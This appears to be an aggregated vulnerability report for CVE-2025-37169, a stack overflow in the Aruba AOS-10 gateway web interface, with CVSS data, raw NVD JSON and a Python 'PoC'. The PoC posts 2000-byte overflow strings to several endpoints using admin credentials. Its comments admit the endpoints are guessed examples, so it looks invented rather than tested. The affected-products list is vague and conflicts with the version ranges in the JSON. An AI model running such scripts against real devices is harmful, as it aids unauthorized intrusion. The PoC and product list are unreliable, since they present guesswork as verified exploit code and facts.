Security Vulnerability Report
中文
CVE-2025-37169 CVSS 7.2 HIGH

CVE-2025-37169

Published: 2026-01-13 20:16:05
Last Modified: 2026-02-25 19:43:16

Description

A stack overflow vulnerability exists in the AOS-10 web-based management interface of a Mobility Gateway. Successful exploitation could allow an authenticated malicious actor to execute arbitrary code as a privileged user on the underlying operating system.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
Aruba Mobility Gateway AOS-10 < 10.4.x.x
Aruba Mobility Gateway AOS-10 < 10.5.x.x
Aruba Mobility Gateway AOS-10 < 10.6.x.x
HPE Aruba 7000 Series Mobility Controllers (需确认具体版本)
HPE Aruba Mobility Express (部分版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-37169 PoC - Stack Overflow in HPE Aruba AOS-10 Management Interface # Target: HPE Aruba Mobility Gateway with AOS-10 # Note: Requires high-privilege authentication TARGET = "https://<target-ip>/rest/v1/" AUTH = ("admin", "password") # High-privilege credentials required def exploit_stack_overflow(target, auth): """ Construct malicious request to trigger stack overflow The overflow occurs in web management interface input handling """ # Stack overflow payload - 2000 bytes of 'A' to overflow buffer # In real attack, this would be crafted shellcode overflow_payload = "A" * 2000 # Example endpoint that processes management interface input endpoints = [ "api/user-management", "api/system-config", "api/network-settings" ] headers = { "Content-Type": "application/json", "X-CSRF-Token": "test" } for endpoint in endpoints: try: # Construct malicious JSON payload data = { "username": overflow_payload, "description": "Malicious input for stack overflow", "config": { "value": overflow_payload } } response = requests.post( f"{target}{endpoint}", json=data, auth=auth, headers=headers, verify=False, timeout=10 ) print(f"[*] Sent payload to {endpoint}: Status {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return True if __name__ == "__main__": print("CVE-2025-37169 PoC - HPE Aruba AOS-10 Stack Overflow") print("Target must be running vulnerable AOS-10 version") print("Requires high-privilege authentication") if len(sys.argv) > 1: TARGET = sys.argv[1] exploit_stack_overflow(TARGET, AUTH)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-37169", "sourceIdentifier": "[email protected]", "published": "2026-01-13T20:16:04.830", "lastModified": "2026-02-25T19:43:16.213", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stack overflow vulnerability exists in the AOS-10 web-based management interface of a Mobility Gateway. Successful exploitation could allow an authenticated malicious actor to execute arbitrary code as a privileged user on the underlying operating system."}, {"lang": "es", "value": "Una vulnerabilidad de desbordamiento de pila existe en la interfaz de gestión basada en web AOS-10 de un Mobility Gateway. Una explotación exitosa podría permitir a un actor malicioso autenticado ejecutar código arbitrario como un usuario privilegiado en el sistema operativo subyacente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.3.0.0", "versionEndExcluding": "10.4.1.10", "matchCriteriaId": "93E77EBB-E46E-47E5-ADD2-1BD80257B08B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.5.0.0", "versionEndExcluding": "10.7.2.2", "matchCriteriaId": "48B3A810-4DD3-403E-9A76-AB86EF7EA9D1"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}